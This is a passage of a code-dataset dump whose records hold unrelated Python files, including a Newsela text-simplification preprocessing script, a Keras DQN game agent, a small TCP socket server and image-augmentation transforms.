(0, yex):\n\treaay.append(((\"mvol/0004/1922/%s\" % '{0:04}'.format(i)), d_aware))\nfor i in range (0, yex):\n\tqueay.append(((\"mvol/0004/1923/%s\" % '{0:04}'.format(i)), d_aware))\nfor i in range (0, yex):\n\tvalay.append(((\"mvol/0004/1924/%s\" % '{0:04}'.format(i)), d_aware))\nfor i in range (0, yex):\n\tinvay.append(((\"mvol/0004/1925/%s\" % '{0:04}'.format(i)), d_aware))\t\t\t\t\n\nexmultilist = multilist(nonay, reaay, queay, valay, invay)","sub_path":"reportapp/reperrapp/listpage/multilist.py","file_name":"multilist.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"314694802","text":"import pickle\n\nfile = open(\"dontDeleteMe!!!\", mode = 'w')\nfile.close()\n\ndef __init__():\n data = [0, 0, 0, 0, 0]\n\n file = open(\"highScores.dat\", mode = 'wb')\n pickle.dump(data, file)\n file.close()\n\ndef run(fileName):\n file = open(str(fileName), mode = 'r')\n fileData = file.read()\n if str(fileData) == '':\n file = open(str(fileName), mode = 'w')\n file.write('Joanna is a silly donught')\n __init__()\n return True\n else:\n return False\n\nrun('dontDeleteMe!!!')\n","sub_path":"final/paddleGameInit.py","file_name":"paddleGameInit.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"523907640","text":"import spacy\nnlp = spacy.load('en')\nimport sys\nimport random\n\nbad_chars = [\"'\", '\"', \"-\", \"!\", \"@\", \"#\", \"$\", \"%\", \"^\", \"&\" , \"*\", \"(\", \")\", \\\n \"_\", \"+\", \"=\", \",\", \"\", \".\", \"?\", \"/\", \"\\\\\", \"~\", \"`\", \"{\", \"[\", \\\n \"}\", \"]\", \"|\", \":\", \";\"]\n\ndef contains_bad(token):\n for b in bad_chars:\n if b in token:\n return True\n return False\n\n## Performs tokenization and named-entity recognition on a sentence\ndef parse_sentence(sentence):\n doc = nlp(sentence)\n data = []\n tokens = [X.text for X in doc]\n for i in range(len(tokens)):\n if tokens[i] == \"''\":\n tokens[i] = '\"'\n elif tokens[i].lower() == \"-rrb-\":\n tokens[i] = \")\"\n elif tokens[i].lower() == \"-lrb-\":\n tokens[i] = \"(\"\n \n data.append(tokens)\n data.append([X.ent_iob_ for X in doc])\n data.append([X.ent_type_ for X in doc])\n\n return data\n\n## Performs only tokenization\ndef tokenize(text):\n tokens = [tok.text for tok in nlp.tokenizer(text)]\n for i in range(len(tokens)):\n if tokens[i] == \"''\":\n tokens[i] = '\"'\n elif tokens[i].lower() == \"-rrb-\":\n tokens[i] = \")\"\n elif tokens[i].lower() == \"-lrb-\":\n tokens[i] = \"(\"\n return tokens\n\n## Gets index of start of sublist in list, if sublist is found\ndef is_sublist(list1, list2):\n found = False\n indices = []\n for i in range(len(list2) - len(list1)):\n for j in range(len(list1)):\n if list1[j] != list2[i+j]:\n found = False\n indices = []\n break\n else:\n indices.append(i+j)\n found = True\n if found:\n return indices\n return []\n\n## Parses all sentences from a file \ndef get_sents(file):\n sents = []\n with open(file, 'r', encoding='utf8') as f:\n for line in f:\n sents.append(parse_sentence(line[:-1]))\n return sents\n\n## Gets original validation/test sentences\ndef get_original(original_folder, v_or_t):\n src_file = original_folder + \"V0V4_V1V4_V2V4_V3V4_V0V3_V0V2_V1V3.aner.ori.\" \\\n + v_or_t + \".src\"\n src_sents = get_sents(src_file)\n \n tgt_file = original_folder + \"V0V4_V1V4_V2V4_V3V4_V0V3_V0V2_V1V3.aner.ori.\" \\\n + v_or_t + \".dst\"\n tgt_sents = get_sents(tgt_file)\n\n return src_sents, tgt_sents\n\ndef analyze_v2(newsela_file):\n distribution = dict()\n for i in range(5):\n for j in range(i+1, 5):\n distribution[(i,j)] = 0\n \n with open(newsela_file, 'r', encoding='utf8') as f:\n for line in f:\n ls = line[:-1].split(\"\\t\")\n version_src = int(ls[0][1])\n version_tgt = int(ls[1][1])\n distribution[version_src, version_tgt] += 1\n\n print(distribution)\n\ndef analyze_v3(newsela_file):\n distribution = dict()\n for i in range(5):\n for j in range(i+1, 5):\n distribution[(i,j)] = 0\n \n with open(newsela_file, 'r', encoding='utf8') as f:\n i = 0\n for line in f:\n if i > 0:\n ls = line[:-1].split(\"\\t\")\n version_src = int(ls[0][1])\n version_tgt = int(ls[1][1])\n distribution[version_src, version_tgt] += 1\n i += 1\n\n print(distribution)\n \n \n\n## Parses all sentences from Newsela version 2\ndef get_v3_sents(newsela_file):\n source_sents = []\n target_sents = []\n\n orig_src = dict()\n orig_tgt = dict()\n\n bads = 0\n with open(newsela_file, 'r', encoding='utf8') as f:\n i = 0\n for line in f:\n if i % 1000 == 0:\n print(i)\n\n# if True:\n if i < 1000:\n if i > 0:\n ls = line[:-1].split(\"\\t\")\n version_src = int(ls[0][1])\n version_tgt = int(ls[1][1])\n\n sent_id = int(ls[9])\n\n sent_src = ls[15]\n sent_tgt = ls[16]\n\n if version_tgt - version_src > 1 or version_src == 3:\n src_parse = parse_sentence(sent_src)\n tgt_parse = [tokenize(sent_tgt), [], []]\n source_sents.append([src_parse, sent_id])\n target_sents.append([tgt_parse, sent_id])\n\n if ls[10] == \"N/A\":\n orig_src[sent_id] = src_parse[0]\n orig_tgt[sent_id] = tgt_parse[0]\n else:\n bads += 1\n else:\n break\n\n i += 1\n print(len(source_sents))\n print(len(list(orig_src.keys())))\n print(bads)\n return source_sents, target_sents, orig_src, orig_tgt\n \ndef get_train(source_sents, target_sents, orig_src, orig_tgt, valid_src, valid_tgt, test_src, test_tgt):\n s_tokens = []\n t_tokens = []\n\n ## Gets all validation and test sentences (tokenized)\n for i in range(len(valid_src)):\n s_tokens.append(valid_src[i][0])\n t_tokens.append(valid_tgt[i][0])\n\n for i in range(len(test_src)):\n s_tokens.append(test_src[i][0])\n t_tokens.append(test_tgt[i][0])\n\n print(s_tokens[0])\n print(t_tokens[0])\n\n ## Keeps pair if not found in validation or test set\n train_src = []\n train_tgt = []\n\n bads = 0\n for i in range(len(source_sents)):\n sent_id = source_sents[i][1]\n\n if i == 0:\n print(source_sents[i][0])\n print(target_sents[i][0])\n\n if orig_src[sent_id] not in s_tokens and orig_tgt[sent_id] not in t_tokens:\n train_src.append(source_sents[i][0])\n train_tgt.append(target_sents[i][0])\n else:\n bads += 1\n\n print(len(train_src))\n print(bads)\n return train_src, train_tgt\n\ndef align_sentences(newsela_v3_file, train_src, train_tgt):\n train_src_v3 = []\n train_tgt_v3 = []\n bads = 0\n bads2 = 0\n \n with open(newsela_v3_file, 'r', encoding='utf8') as f:\n c = 0\n for line in f:\n if c % 100000 == 0:\n print(c)\n c += 1\n\n if True:\n# if c < 10000:\n if c > 1:\n ls = line[:-1].split(\"\\t\")\n sent_id = int(ls[9])\n\n if ls[10] != \"N/A\":\n replaced_id_old = int(ls[11])\n\n try:\n orig_src = list(train_src[sent_id])\n orig_tgt = list(train_tgt[sent_id])\n\n if ls[10] == \"COMPLEX\":\n ## Finds replaced id\n new_src = tokenize(ls[15])\n if len(orig_src) == len(new_src):\n for i in range(len(new_src)):\n if new_src[i].lower() != orig_src[0][i].lower() \\\n and new_src[i] != \"--\" \\\n and len(new_src[i]) > 1:\n replaced_id = i\n break\n\n old_word = orig_src[0][replaced_id]\n replaced_word = new_src[replaced_id]\n orig_src[0][replaced_id] = replaced_word\n\n if True:\n print(\"COMPLEX: \" + str(c))\n print(replaced_word)\n print(old_word)\n print(\"\\n\")\n\n train_src_v3.append(orig_src)\n train_tgt_v3.append(orig_tgt)\n else:\n bads2 += 1\n else:\n ## Finds replaced id\n new_tgt = tokenize(ls[16])\n if len(orig_tgt) == len(new_tgt):\n for i in range(len(new_tgt)):\n if new_tgt[i].lower() != orig_tgt[0][i].lower() \\\n and new_src[i] != \"--\" \\\n and len(new_src[i]) > 1:\n replaced_id = i\n break\n \n replaced_word = new_tgt[replaced_id]\n orig_tgt[0][replaced_id] = replaced_word\n\n if True:\n print(\"SIMPLE: \" + str(c))\n print(replaced_word)\n print(replaced_id)\n print(\"\\n\")\n \n train_src_v3.append(orig_src)\n train_tgt_v3.append(orig_tgt)\n else:\n bads2 += 1\n \n except KeyError:\n bads += 1\n continue\n else:\n try:\n train_src_v3.append(train_src[sent_id])\n train_tgt_v3.append(train_tgt[sent_id])\n except KeyError:\n bads2 += 1\n continue\n else:\n break\n\n print(len(train_src_v3))\n print(bads)\n print(bads2)\n return train_src_v3, train_tgt_v3\n \n## Saves non-anonymized sentences\ndef save_original_data(data, output_file):\n with open(output_file, 'w', encoding='utf8') as f:\n for sent in data:\n f.write(\" \".join(sent[0]) + \"\\n\")\n\n## Anonymizes sentences\ndef anonymize_data(sents):\n anonymized_data = []\n\n for sent in sents:\n ori_tokens = sent[0]\n bio = sent[1]\n types = sent[2]\n\n all_nes = []\n all_types = []\n\n ## Groups all entities\n current_ne = []\n current_type = \"\"\n for i in range(len(ori_tokens)):\n if bio[i] == \"B\":\n if current_ne != []:\n all_nes.append(current_ne)\n all_types.append(current_type)\n current_ne = [i]\n current_type = types[i]\n elif bio[i] == \"I\":\n current_ne.append(i)\n else:\n if current_ne != []:\n all_nes.append(current_ne)\n all_types.append(current_type)\n current_ne = []\n current_type = \"\"\n if current_ne != []:\n all_nes.append(current_ne)\n all_types.append(current_type)\n\n ## Makes anonymized dictionary for sentence\n aner_dict = dict()\n ne_starts_dict = dict()\n for i in range(len(all_nes)):\n anonymized = False\n c = 1\n while not anonymized:\n try:\n a = aner_dict[all_types[i] + \"@\" + str(c)]\n c += 1\n except KeyError:\n aner_dict[all_types[i] + \"@\" + str(c)] = \" \".join([ori_tokens[j] for j in all_nes[i]])\n ne_starts_dict[all_nes[i][0]] = (all_nes[i], all_types[i] + \"@\" + str(c))\n anonymized = True\n \n ## Makes anonymized sentence\n anon_tokens = []\n i = 0\n while i < len(ori_tokens):\n if i not in ne_starts_dict.keys():\n anon_tokens.append(ori_tokens[i])\n i += 1\n else:\n ## Includes anonymized label\n current_ne_label = ne_starts_dict[i][1]\n anon_tokens.append(current_ne_label)\n\n ## Skips over indices that are part of named entity\n current_ne_indices = ne_starts_dict[i][0]\n for j in current_ne_indices:\n i += 1\n \n anonymized_data.append((anon_tokens, aner_dict)) \n return anonymized_data\n\n## Anonymizes target sentences\ndef anonymize_target_data(tgt_sents, src_aner):\n anonymized_data = []\n\n for i in range(len(tgt_sents)):\n if i == 0:\n print(tgt_sents[i])\n print(tgt_sents[i][0])\n print(src_aner[i][1])\n ori_tokens = tgt_sents[i][0]\n\n all_nes = []\n all_types = []\n\n ## Finds all named entities from complex sentence that\n ## are also found in the simple sentence\n for k,v in src_aner[i][1].items():\n ner = v.split(\" \")\n indices = is_sublist(ner, ori_tokens)\n\n if indices != []:\n all_nes.append(indices)\n all_types.append(k)\n\n ## Makes anonymized dictionary for sentence\n aner_dict = dict()\n ne_starts_dict = dict()\n for j in range(len(all_nes)):\n anonymized = False\n while not anonymized:\n try:\n a = aner_dict[all_types[j]]\n except KeyError:\n ne_starts_dict[all_nes[j][0]] = (all_nes[j], all_types[j])\n anonymized = True\n\n if i == 0:\n print(ori_tokens)\n \n ## Makes anonymized sentence\n anon_tokens = []\n j = 0\n while j < len(ori_tokens):\n if j not in ne_starts_dict.keys():\n anon_tokens.append(ori_tokens[j])\n j += 1\n else:\n ## Includes anonymized label\n current_ne_label = ne_starts_dict[j][1]\n anon_tokens.append(current_ne_label)\n\n ## Skips over indices that are part of named entity\n current_ne_indices = ne_starts_dict[j][0]\n for k in current_ne_indices:\n j += 1\n\n if i == 0:\n print(anon_tokens)\n print(\"\\n\")\n \n anonymized_data.append(anon_tokens) \n return anonymized_data\n\n## Saves anonymized sentences and anonymization mappings\ndef save_aner_data(anonymized_data, indices, output_file, anon_file):\n with open(output_file, 'w', encoding='utf8') as f:\n for i in indices:\n sent = []\n for s in anonymized_data[i][0]:\n if \"@\" not in s:\n sent.append(s.lower())\n else:\n sent.append(s.upper())\n f.write(\" \".join(sent) + \"\\n\")\n\n with open(anon_file, 'w', encoding='utf8') as f:\n for i in range(indices):\n anons = []\n for v,k in anonymized_data[i][1].items():\n anons.append(v.upper() + \"::\" + k)\n f.write(\"\\t\".join(anons) + \"\\n\")\n\n## Saves anonymized target sentences\ndef save_aner_tgt_data(anonymized_data, indices, output_file):\n with open(output_file, 'w', encoding='utf8') as f:\n for i in indices:\n sent = []\n for s in anonymized_data[i]:\n if \"@\" not in s:\n sent.append(s.lower())\n else:\n sent.append(s.upper())\n f.write(\" \".join(sent) + \"\\n\")\n \ndef main(newsela_file, newsela_v3_file, original_valid_folder, original_test_folder, output_folder):\n random.seed(37)\n# print(\"Analyzing Newsela v2 data...\")\n# analyze_v2(newsela_file)\n# print(\"Analyzing Newsela v3 data...\")\n# analyze_v3(newsela_v3_file)\n \n ## Parses all sentences from validation and test set\n print(\"Getting validation data...\")\n valid_src, valid_tgt = get_original(original_valid_folder, 'valid')\n print(\"Getting test data...\")\n test_src, test_tgt = get_original(original_test_folder, 'test')\n\n ## Parses all sentences from Newsela version 3\n print(\"Getting v2 data...\")\n source_sents, target_sents, orig_src, orig_tgt = get_v3_sents(newsela_v3_file)\n\n ## Only includes sentences not found in validation or test sentences\n print(\"Splitting training data...\")\n train_src, train_tgt = get_train(source_sents, target_sents, orig_src, orig_tgt, valid_src, \\\n valid_tgt, test_src, test_tgt)\n\n ## Aligns v3 with v3 parses\n print(\"Getting v3 data...\")\n# train_src, train_tgt = align_sentences(newsela_v3_file, train_src, train_tgt)\n\n ## Saves original data\n print(\"Saving original data...\")\n save_original_data(train_src, output_folder + \"train/train.ori.src\")\n save_original_data(train_tgt, output_folder + \"train/train.ori.tgt\")\n save_original_data(valid_src, output_folder + \"valid/valid.ori.src\")\n save_original_data(valid_tgt, output_folder + \"valid/valid.ori.tgt\")\n save_original_data(test_src, output_folder + \"test/test.ori.src\")\n save_original_data(test_tgt, output_folder + \"test/test.ori.tgt\")\n \n ## Anonymizes data\n print(\"Anonymizing data...\")\n train_src_aner = anonymize_data(train_src)\n train_tgt_aner = anonymize_target_data(train_tgt, train_src_aner)\n valid_src_aner = anonymize_data(valid_src)\n valid_tgt_aner = anonymize_target_data(valid_tgt, valid_src_aner)\n test_src_aner = anonymize_data(test_src)\n test_tgt_aner = anonymize_target_data(test_tgt, test_src_aner)\n\n train_indices = [i for i in range(len(train_src_aner))]\n# random.shuffle(train_indices)\n valid_indices = [i for i in range(len(valid_src_aner))]\n test_indices = [i for i in range(len(test_src_aner))]\n \n ## Saves anonymized data\n print(\"Saving anonymized data...\")\n save_aner_data(train_src_aner, train_indices, output_folder + \"train/train.aner.src\", output_folder + \"train/train.src.aner_map\")\n save_aner_tgt_data(train_tgt_aner, train_indices, output_folder + \"train/train.aner.tgt\")\n save_aner_data(valid_src_aner, valid_indices, output_folder + \"valid/valid.aner.src\", output_folder + \"valid/valid.src.aner_map\")\n save_aner_tgt_data(valid_tgt_aner, valid_indices, output_folder + \"valid/valid.aner.tgt\")\n save_aner_data(test_src_aner, test_indices, output_folder + \"test/test.aner.src\", output_folder + \"test/test.src.aner_map\")\n save_aner_tgt_data(test_tgt_aner, test_indices, output_folder + \"test/test.aner.tgt\")\n \n \n \nif __name__ == '__main__':\n newsela_file = sys.argv[1]\n newsela_v3_file = sys.argv[2]\n original_valid_folder = sys.argv[3]\n original_test_folder = sys.argv[4]\n output_folder = sys.argv[5]\n main(newsela_file, newsela_v3_file, original_valid_folder, original_test_folder, output_folder)\n\n'''\nRunning on Tesla:\n\ncd ~/sockeye-recipes/new_scripts/preprocess_data/\n\npython3 prepare_Newsela_v3.py \\\n/data2/text_simplification/Newsela_v2/newsela_aligned_v2/newsela_pairs_v2.txt \\\n/data2/text_simplification/Newsela_v3/newsela_aligned_v3/newsela_pairs_v3.txt \\\n/data2/text_simplification/dataset/valid/ \\\n/data2/text_simplification/dataset/test/ \\\n/data2/text_simplification/Newsela_v3/\n'''\n","sub_path":"new_scripts/preprocess_data/prepare_Newsela_v3.py","file_name":"prepare_Newsela_v3.py","file_ext":"py","file_size_in_byte":19298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"169910593","text":"def batchConv2d(layer,kernel):\n out_dim = kernel.shape[1]\n kernel.contiguous().view([[-1]+list(kernel.shape[2:])])\n # mixing batch size and output dim\n layer =layer.view([1,-1] + list(layer.shape[2:]))\n # mixing batch size and input dim\n layer = F.conv2d(layer, kernel,groups=self.batchsize)\n layer= layer.view(self.batchsize,out_dim,layer.shape[2],x.shape[3])\n #unsqueezing the layer\n return layer","sub_path":"modules/untitled.py","file_name":"untitled.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"102129770","text":"import os\nimport numpy as np\nimport gym\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Conv2D, Activation, Flatten\nfrom keras.optimizers import Adam\nfrom collections import deque\nimport random\nimport os\nimport time\n\nclass DQNAgent_5c:\n def __init__(self, env, memory_len = 10000):\n \n self.env = env\n self.agent_name = \"DQN_Agent_5c\"\n \n self.state_dim = self.env.observation_space.shape\n self.actions_dim = self.env.action_space.n\n \n self.n_features = np.prod(np.array(self.state_dim))\n \n self.memory_len = memory_len\n self.batch_size = 32\n\n self.learning_rate = 0.0001\n self.gamma = 0.99\n \n # using np array so that calculations are faster instead of dequeue\n self.memory = np.zeros((self.memory_len, 3 + self.n_features*2)) \n\n self.epsilon = 1.0\n self.epsilon_min = 0.05\n\n\n self.save_weights_cycle = 100\n self.start_after = 10\n self.update_cycle = 50\n self.learn_cycle = 1\n\n self.memory_counter = 0\n \n self.model_eval = self.build_model() \n self.model_target = self.build_model()\n\n print(\"===============================\")\n print(\"The agent\",self.agent_name,\"is initiallized with below parameter values.\")\n print(\"memory buffer limit:%i\\nbatch size:%i\\nlearning_rate:%.4f\\ngamma:%.2f\\n\" % (self.memory_len,self.batch_size,self.learning_rate, self.gamma))\n print(\"Below is the neural network used:\")\n print(self.model_eval.summary())\n print(\"===============================\")\n\n self.model_eval_path = \"model_eval_weights_\"\n self.model_target_path = \"model_target_weights_\"\n \n def build_model(self):\n\n kernel_initializer = keras.initializers.VarianceScaling(scale=1.0, mode='fan_in', distribution=\"normal\", seed=None)\n bias_initializer = \"zeros\"\n \n model = Sequential()\n \n model.add(Conv2D(input_shape=self.state_dim,data_format=\"channels_last\",\n filters=16, kernel_size=(8,8), strides=(4,4),\n padding=\"same\", activation=\"relu\",\n kernel_initializer=kernel_initializer))\n\n model.add(Conv2D(data_format=\"channels_last\",\n filters=32, kernel_size=(6,6), strides=(2,2),\n padding=\"same\", activation=\"relu\",\n kernel_initializer=kernel_initializer))\n \n model.add(Conv2D(data_format=\"channels_last\",\n filters=32, kernel_size=(4,4), strides=(1,1),\n padding=\"same\", activation=\"relu\",\n kernel_initializer=kernel_initializer))\n\n model.add(Conv2D(data_format=\"channels_last\",\n filters=64, kernel_size=(4,4), strides=(2,2),\n padding=\"same\", activation=\"relu\",\n kernel_initializer=kernel_initializer))\n \n model.add(Conv2D(data_format=\"channels_last\",\n filters=64, kernel_size=(3,3), strides=(1,1),\n padding=\"same\", activation=\"relu\",\n kernel_initializer=kernel_initializer))\n \n model.add(Flatten(data_format=\"channels_last\"))\n \n model.add(Dense(units=512, activation=\"relu\",\n kernel_initializer=kernel_initializer,\n bias_initializer = bias_initializer))\n \n # None activation is same as linear activation\n model.add(Dense(units=self.actions_dim, activation=None,\n kernel_initializer=kernel_initializer,\n bias_initializer = bias_initializer))\n \n optimizer = keras.optimizers.RMSprop(learning_rate=self.learning_rate, rho=0.99)\n \n model.compile(loss=\"mse\", optimizer=optimizer)\n \n return model\n \n\n def memorize(self, state, action, reward, done, next_state):\n\n transition = np.hstack((np.reshape(state, [-1]), [action, reward, int(done)], np.reshape(next_state, [-1])))\n index = self.memory_counter % self.memory_len \n self.memory[index,:] = transition\n self.memory_counter +=1\n \n def learn_from_memory(self):\n\n if self.memory_counter > self.memory_len: \n sample_indices = np.random.choice(self.memory_len, size=self.batch_size, replace=False)\n else: \n sample_indices = np.random.choice(self.memory_counter, size=self.batch_size)\n\n minibatch = self.memory[sample_indices, :]\n states_shape = [self.batch_size] + [dim for dim in self.state_dim] # [batch_size, 84, 84, 4]\n \n states = np.reshape(minibatch[:,:self.n_features], newshape=states_shape)\n actions = minibatch[:,self.n_features].astype(int)\n rewards = minibatch[:,self.n_features +1]\n done = minibatch[:, self.n_features + 2]\n next_states = np.reshape(minibatch[:,-self.n_features:], newshape=states_shape)\n \n q_new = self.model_eval.predict(states)\n q_old = self.model_target.predict(next_states)\n q_target = q_new.copy() \n \n # gets list of indices 0 to batchsize\n batch_indices = np.arange(self.batch_size, dtype=np.int32) \n\n selected_q_old = np.max(q_old, axis=1)\n\n q_target[batch_indices,actions] = rewards + (1-done) * self.gamma * selected_q_old\n \n self.model_eval.fit(states, q_target, epochs=1, verbose=0)\n \n\n def decay_epsilon(self):\n if self.epsilon > self.epsilon_min:\n self.epsilon *= self.epsilon_decay\n\n def train_agent(self, total_episodes=18000, epsilon_decay=0.9998, render = False, save_weights=False):\n print(\"Now training\", self.agent_name)\n\n self.epsilon = 1.0\n self.epsilon_decay = epsilon_decay\n\n self.hist_rewards = []\n self.hist_epsilon_values = []\n\n\n start_time = time.time()\n for episode in range(1, total_episodes+1):\n \n done = False\n state = self.env.reset()\n reward_every_episode = 0\n \n while not done:\n\n if render:\n self.env.render()\n\n action = self.take_action(state) \n next_state, reward, done, info = self.env.step(action)\n reward_every_episode += reward\n \n self.memorize(state, action, reward, done, next_state)\n \n state = next_state\n\n if episode > self.start_after:\n self.epsilon = self.epsilon*self.epsilon_decay\n if episode % self.learn_cycle == 0:\n self.learn_from_memory()\n \n if episode % self.update_cycle == 0:\n self.model_target.set_weights(self.model_eval.get_weights())\n \n self.hist_rewards.append(reward_every_episode)\n self.hist_epsilon_values.append(self.epsilon)\n\n if save_weights and (episode % self.save_weights_cycle == 0):\n self.model_eval.save_weights(self.model_eval_path + str(episode) +\".h5\")\n self.model_target.save_weights(self.model_target_path + str(episode) +\".h5\")\n\n time_spent = time.time() - start_time\n print('Episode: %i/%i, Episode Reward: %i, Epsilon: %.5f, Time Spent: %i hours %i minutes' % \n (episode, total_episodes, reward_every_episode, self.epsilon , int((time_spent/60)/60), int((time_spent/60)%60)), end=\"\\r\")\n print(\"\\nTraining of\", self.agent_name, \"completed.\")\n\n def take_action(self, state, test=True): \n if (np.random.uniform() <= self.epsilon):\n return np.random.randint(0, self.actions_dim)\n else:\n state = np.expand_dims(state, axis=0)\n actions_value = self.model_eval.predict(state)\n return np.argmax(actions_value)\n \n def test_agent(self, runs = 30, render = False):\n \n self.epsilon = 0\n best_score = 0\n\n for run in range(1, runs+1):\n\n done = False\n state = self.env.reset()\n cur_score = 0\n\n while not done:\n if render:\n self.env.render()\n action = self.take_action(state) \n next_state, reward, done, info = self.env.step(action)\n cur_score += reward\n state = next_state\n print(\"Agent: %s \\t Run: %i/%i | Score: %i\" % (self.agent_name, run, runs, cur_score), end=\"\\r\")\n \n best_score = best_score if best_score>cur_score else cur_score\n\n print(\"\\n%s Agent's High Score in %i runs: %i \" %(self.agent_name, runs, best_score))\n \n def set_model_weights(self, e_num):\n self.model_eval.load_weights(self.model_eval_path+str(e_num)+\".h5\")\n self.model_target.load_weights(self.model_target_path+str(e_num)+\".h5\")\n \n def test_runs_progressive(self, e_nums, episodes = 10, rend = True):\n for e_num in e_nums:\n print(\"weights at:\",e_num)\n self.set_model_weights(e_num)\n self.test_agent()","sub_path":"Final code/agents/dqn_agent_5c.py","file_name":"dqn_agent_5c.py","file_ext":"py","file_size_in_byte":9017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"463516595","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 6 10:17:08 2018\n\n@author: li\n\"\"\"\n\nimport socket\nbind_ip = \"10.42.0.1\"\nbind_port = 9999\n\nserver = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\nserver.bind((bind_ip,bind_port))\n#表示最多建立5个连接\nserver.listen(5)\ntry:\n while True:\n client,add = server.accept()\n print (\"[*]你监听的是:%s:%d\" % (add[0],add[1]))\n while True:\n data = client.recv(1024)\n if not data:\n break\n print(data)\n data = input('> ')\n client.send(data)\n# print data\n else:\n client.close()\nexcept Exception as e:\n print(e)\nserver.close()","sub_path":"tcp_host.py","file_name":"tcp_host.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"132352063","text":"import sys\nwith open(sys.argv[1],'r') as myfile:\n data = myfile.read()\norigList = data.split()\nresultList=[]\nnum = 0\nfor i in origList:\n location=-1\n for j in resultList:\n if i == j :\n location = resultList.index(j)\n if location==-1 :\n resultList.append(i)\n resultList.append(num)\n resultList.append(1)\n num = num + 1\n else:\n resultList[location+2] = resultList[location+2]+1\nnowLoc=0\nans = ''\nfor i in resultList:\n if nowLoc % 3 == 0:\n ans+=(str(i))\n ans+=(' ')\n nowLoc = nowLoc+1;\n elif nowLoc % 3 == 1:\n ans+=(str(i))\n ans+=(' ')\n nowLoc+=1\n elif nowLoc != 3*num-1:\n ans+=(str(i))\n ans+=(\"\\n\")\n nowLoc+=1\n else:\n ans+=(str(i))\nwith open(\"Q1.txt\",\"w\") as output:\n output.write(ans)\n","sub_path":"hw0/Q1.py","file_name":"Q1.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"115170812","text":"import numpy as np\nimport torch\nfrom torchvision.transforms import ColorJitter, Resize, Normalize\nfrom PIL import Image\n\n# ------------------------------------------------------------------------------\n# Image Resize\n# ------------------------------------------------------------------------------\nclass ImageResize(object):\n \"\"\"Resize image and targets to specified size.\n \"\"\"\n\n # --------------------------------------------------------------------------\n def __init__(self, output_size):\n assert isinstance(output_size, (int, tuple))\n if isinstance(output_size, int):\n self.output_size = (output_size, output_size)\n else:\n assert len(output_size) == 2\n self.output_size = output_size\n \n self.tform = Resize(self.output_size)\n\n # --------------------------------------------------------------------------\n def __call__(self, inputs):\n \"\"\"\n Random contextual image crop to desired image size.\n \"\"\"\n image = inputs['image']\n H, W = image.shape[:2]\n rois = inputs['ROI']\n image = self.tform.__call__(Image.fromarray(image))\n image = np.array(image)\n \n # Resize ROIs:\n scale = self.output_size / np.array([H,W], dtype=np.float)\n scale = np.tile(scale, 2)\n rois[:,:4] = scale * rois[:,:4]\n rois = np.round(rois)\n \n return {'image': image, 'ROI': rois}\n \n# ------------------------------------------------------------------------------\n# Randomized Image Crop\n# ------------------------------------------------------------------------------\nclass RandomCrop(object):\n \"\"\"Crop randomly the image in a sample.\n\n Args:\n border_size (tuple or int): Desired crop border size. If int, square crop is made.\n \"\"\"\n\n # --------------------------------------------------------------------------\n def __init__(self, output_size):\n assert isinstance(output_size, (int, tuple))\n if isinstance(output_size, int):\n self.output_size = (output_size, output_size)\n else:\n assert len(output_size) == 2\n self.output_size = output_size\n\n # --------------------------------------------------------------------------\n def __call__(self, inputs):\n \"\"\"\n Random contextual image crop to desired image size.\n \"\"\"\n image = inputs['image']\n rois = inputs['ROI']\n H, W = image.shape[:2]\n \n # Contextual aware crop: Crop to maximally retain ROIs.\n # Identify the region containing the ROIs and crop outside this \n # region.\n roi_top = np.amin(rois[:,0:2], axis=0)\n roi_left = np.amax(rois[:,2:4], axis=0)\n \n region = np.zeros(4, dtype=int)\n \n # Sample row indices:\n if H - roi_left[0] < roi_top[0] + 1:\n # ROIs closer to the lower edge. Sample the y2 region location.\n regend = min(max(roi_left[0], self.output_size[0])+1, H-1)\n region[2] = np.random.randint(regend, H)\n region[0] = region[2] - self.output_size[0] + 1\n else:\n # ROIs closer to the upper edge. Sample the y1 region location.\n regstart = max(min(roi_top[0], H-self.output_size[0]), 1)\n region[0] = np.random.randint(0, regstart)\n region[2] = region[0] + self.output_size[0] - 1\n \n # Sample col indices:\n if W - roi_left[1] < roi_top[1] + 1:\n # ROIs closer to the right edge. Sample the x2 region location.\n regend = min(max(roi_left[1], self.output_size[1])+1, W-1)\n region[3] = np.random.randint(regend, W)\n region[1] = region[3] - self.output_size[1] + 1\n else:\n # ROIs closer to the left edge. Sample the x1 region location.\n regstart = max(min(roi_top[1], W-self.output_size[1]), 1)\n region[1] = np.random.randint(0, regstart)\n region[3] = region[1] + self.output_size[1] - 1\n \n # Crop image at sampled region:\n image = image[region[0]:region[2]+1, region[1]:region[3]+1]\n\n # Adjust ROI locations to image origin shift and only retain the ones \n # that fit inside the cropped region.\n rois[:,:4] = rois[:,:4] - np.tile(region[:2], 2)\n keep = np.all((rois[:,:4] >= 0) & \n (rois[:,:4] < np.tile(self.output_size, 2)), axis=1)\n rois = rois[keep,:]\n\n return {'image': image, 'ROI': rois}\n#_______________________________________________________________________________\n\n# ------------------------------------------------------------------------------\n# Randomized Image Horizontal Flip\n# ------------------------------------------------------------------------------\nclass RandomHorizontalFlip(object):\n \"\"\"Flip input image horizontally at random with a probability of 0.5\"\"\"\n\n # --------------------------------------------------------------------------\n def __call__(self, inputs):\n \"\"\"Random image flip along Y axis\"\"\"\n image = inputs['image']\n rois = inputs['ROI']\n \n if np.random.random_sample() > 0.5:\n # Flip if the sample drawn is larger than 0.5 in a uniform \n # distribution range of [0. 1.)\n image = np.fliplr(image).copy()\n \n # Convert ROI coordinates:\n rois[:, [1,3]] = 